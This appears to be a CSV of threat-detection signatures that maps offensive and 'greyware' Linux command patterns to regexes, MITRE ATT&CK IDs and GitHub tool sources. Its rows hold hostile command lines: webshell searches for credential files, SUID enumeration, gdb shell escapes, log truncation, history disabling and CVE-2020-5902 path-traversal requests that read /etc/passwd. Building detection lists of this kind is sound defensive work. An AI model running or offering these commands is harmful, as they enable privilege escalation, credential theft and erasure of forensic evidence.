"*find / -type f -name .fetchmailrc*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.fetchmailrc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*find / -type f -name .fetchmailrc*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.fetchmailrc.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*curl -v -k  'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*",".{0,1000}curl\s\-v\s\-k\s\s\'https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/etc\/passwd.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jas502n/CVE-2020-5902","1","0","#linux","N/A","N/A","4","371","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z"
"*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/etc\/passwd.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/yasserjanah/CVE-2020-5902","1","0","#linux","N/A","N/A","1","43","14","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z"
"*/tmp/passwd.bak*",".{0,1000}\/tmp\/passwd\.bak.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#linux","N/A","10","6","558","142","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z"
"*find / -type f -name config.inc.php*",".{0,1000}find\s\/\s\-type\sf\s\-name\sconfig\.inc\.php.{0,1000}","greyware_tool_keyword","find","find commands used by the wso php webshell","T1100 - T1027 - T1059","TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find / -type f -name config.inc.php*",".{0,1000}find\s\/\s\-type\sf\s\-name\sconfig\.inc\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*find / -type f -name config.inc.php*",".{0,1000}find\s\/\s\-type\sf\s\-name\sconfig\.inc\.php.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find / -type f -name service.pwd*",".{0,1000}find\s\/\s\-type\sf\s\-name\sservice\.pwd.{0,1000}","greyware_tool_keyword","find","find commands used by the wso php webshell","T1100 - T1027 - T1059","TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find / -type f -name service.pwd*",".{0,1000}find\s\/\s\-type\sf\s\-name\sservice\.pwd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*find / -type f -name service.pwd*",".{0,1000}find\s\/\s\-type\sf\s\-name\sservice\.pwd.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find / -type f -perm -02000 -ls*",".{0,1000}find\s\/\s\-type\sf\s\-perm\s\-02000\s\-ls.{0,1000}","greyware_tool_keyword","find","find commands used by the wso php webshell","T1100 - T1027 - T1059","TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find / -type f -perm -02000 -ls*",".{0,1000}find\s\/\s\-type\sf\s\-perm\s\-02000\s\-ls.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*find / -type f -perm -02000 -ls*",".{0,1000}find\s\/\s\-type\sf\s\-perm\s\-02000\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find / -type f -perm -04000 -ls*",".{0,1000}find\s\/\s\-type\sf\s\-perm\s\-04000\s\-ls.{0,1000}","greyware_tool_keyword","find","find commands used by the wso php webshell","T1100 - T1027 - T1059","TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find / -type f -perm -04000 -ls*",".{0,1000}find\s\/\s\-type\sf\s\-perm\s\-04000\s\-ls.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*find / -type f -perm -04000 -ls*",".{0,1000}find\s\/\s\-type\sf\s\-perm\s\-04000\s\-ls.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*find / -uid 0 -perm -4000 -type f *",".{0,1000}find\s\/\s\-uid\s0\s\-perm\s\-4000\s\-type\sf\s.{0,1000}","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A"
"*find / -user root -perm -6000 -type f 2>*",".{0,1000}find\s\/\s\-user\sroot\s\-perm\s\-6000\s\-type\sf\s2\>.{0,1000}","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*find / -xdev -user root \( -perm -4000 -o -perm -2000 -o -perm -6000 \) 2>/dev/null*",".{0,1000}find\s\/\s\-xdev\s\-user\sroot\s\\\(\s\-perm\s\-4000\s\-o\s\-perm\s\-2000\s\-o\s\-perm\s\-6000\s\\\)\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*find /* -perm -04000 -o -perm -02000*",".{0,1000}find\s\/.{0,1000}\s\-perm\s\-04000\s\-o\s\-perm\s\-02000.{0,1000}","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*find /* -perm -u=s -type f 2>*",".{0,1000}find\s\/.{0,1000}\s\-perm\s\-u\=s\s\-type\sf\s2\>.{0,1000}","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*find /var/log -type f -exec truncate -s 0 {} \*",".{0,1000}find\s\/var\/log\s\-type\sf\s\-exec\struncate\s\-s\s0\s\{\}\s\\.{0,1000}","greyware_tool_keyword","find","truncate every file under /var/log to size 0 - no log content = no forensic.","T1486 - T1553 - T1592.002 - T1081","TA0005 - TA0007 - TA0009","N/A","N/A","Defense Evasion","N/A","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*find_domain.sh *",".{0,1000}find_domain\.sh\s.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","#linux","N/A","8","4","336","64","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z"
"*echowrecker*",".{0,1000}echowrecker.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols)  for FreeBSD  OpenBSD 3.1  OpenBSD 3.2 (with a non-executable stack  zomg)  and Linux. Likely CVE-2003-0201. There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","#linux","N/A","N/A","10","4099","2069","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z"
"*export HISTFILE=/dev/null*",".{0,1000}export\sHISTFILE\=\/dev\/null.{0,1000}","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*export HISTFILESIZE=0*",".{0,1000}export\sHISTFILESIZE\=0.{0,1000}","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*export HISTSIZE=0*",".{0,1000}export\sHISTSIZE\=0.{0,1000}","greyware_tool_keyword","export","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*Witness.py*",".{0,1000}Witness\.py.{0,1000}","offensive_tool_keyword","EyeWitness","EyeWitness is designed to take screenshots of websites provide some server header info. and identify default credentials if known.EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line. nmap xml output. or nessus xml output. The --timeout flag is completely optional. and lets you provide the max time to wait when trying to render and screenshot a web page.","T1564 - T1518 - T1210 - T1514 - T1552","TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/FortyNorthSecurity/EyeWitness","1","1","#linux","N/A","N/A","10","5024","852","2024-10-22T22:50:50Z","2014-02-26T16:23:25Z"
"*./getExploit*",".{0,1000}\.\/getExploit.{0,1000}","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/Gioyik/getExploit","1","1","#linux","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z"
"*getExploit.py*",".{0,1000}getExploit\.py.{0,1000}","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/Gioyik/getExploit","1","1","#linux","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z"
"*Gioyik/getExploit*",".{0,1000}Gioyik\/getExploit.{0,1000}","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/Gioyik/getExploit","1","1","#linux","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z"
"*/GhostInTheNet.git*",".{0,1000}\/GhostInTheNet\.git.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","#linux","N/A","7","4","369","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z"
"*/GhostInTheNet.sh*",".{0,1000}\/GhostInTheNet\.sh.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","#linux","N/A","7","4","369","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z"
"*/GhostInTheNet-master*",".{0,1000}\/GhostInTheNet\-master.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","#linux","N/A","7","4","369","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z"
"*/tmp/host.ghost*",".{0,1000}\/tmp\/host\.ghost.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","#linux","N/A","7","4","369","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z"
"*Find-Secret -FilePath ./logs.txt -Regex *",".{0,1000}Find\-Secret\s\-FilePath\s\.\/logs\.txt\s\-Regex\s.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","#linux","N/A","9","1","78","11","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z"
"*/tmp/mac.ghost*",".{0,1000}\/tmp\/mac\.ghost.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","#linux","N/A","7","4","369","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z"
"*GhostInTheNet off*",".{0,1000}GhostInTheNet\soff.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","#linux","N/A","7","4","369","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z"
"*GhostInTheNet on*",".{0,1000}GhostInTheNet\son.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","#linux","N/A","7","4","369","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z"
"*/#kali-installer-images*",".{0,1000}\/\#kali\-installer\-images.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/detail/kali-linux/*",".{0,1000}\/detail\/kali\-linux\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/kali/pool/main/*",".{0,1000}\/kali\/pool\/main\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/kali-linux-2023*",".{0,1000}\/kali\-linux\-2023.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/kali-tools-*",".{0,1000}\/kali\-tools\-.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/nethunter-images/*",".{0,1000}\/nethunter\-images\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/raw/kali/main/*",".{0,1000}\/raw\/kali\/main\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/raw/kali/master/*",".{0,1000}\/raw\/kali\/master\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*\kali-linux-2023*",".{0,1000}\\kali\-linux\-2023.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*archive-*.kali.org/*",".{0,1000}archive\-.{0,1000}\.kali\.org\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*fuzzers/rippackets.pl*",".{0,1000}fuzzers\/rippackets\.pl.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*cdimage.kali.org/*",".{0,1000}cdimage\.kali\.org\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*-d kali-linux *",".{0,1000}\-d\skali\-linux\s.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*gdb -nx -ex 'python import os*os.execl(\""/bin/sh\*",".{0,1000}gdb\s\-nx\s\-ex\s\'python\simport\sos.{0,1000}os\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*genie -c '/bin/sh'*",".{0,1000}genie\s\-c\s\'\/bin\/sh\'.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*GET */login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts*",".{0,1000}GET\s.{0,1000}\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/etc\/hosts.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/yasserjanah/CVE-2020-5902","1","0","#linux","N/A","N/A","1","43","14","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z"
"*-t * -x lfr -f /etc/passwd*",".{0,1000}\-t\s.{0,1000}\s\-x\slfr\s\-f\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/dunderhay/CVE-2020-5902","1","0","#linux","N/A","N/A","1","37","8","2024-03-19T01:21:06Z","2020-07-06T04:03:58Z"
"*https://gitlab.com/kalilinux/*",".{0,1000}https\:\/\/gitlab\.com\/kalilinux\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://kali.download*",".{0,1000}https\:\/\/kali\.download\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*hub.docker.com/u/kalilinux/*",".{0,1000}hub\.docker\.com\/u\/kalilinux\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*--install -d kali-linux*",".{0,1000}\-\-install\s\-d\skali\-linux.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*kali-*.deb*",".{0,1000}kali\-.{0,1000}\.deb.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*kali-linux*.7z*",".{0,1000}kali\-linux.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*kali-linux*.img*",".{0,1000}kali\-linux.{0,1000}\.img.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*kali-linux*.iso*",".{0,1000}kali\-linux.{0,1000}\.iso.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*kali-linux-*.torrent*",".{0,1000}kali\-linux\-.{0,1000}\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*kali-linux-*.vmdk*",".{0,1000}kali\-linux\-.{0,1000}\.vmdk.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
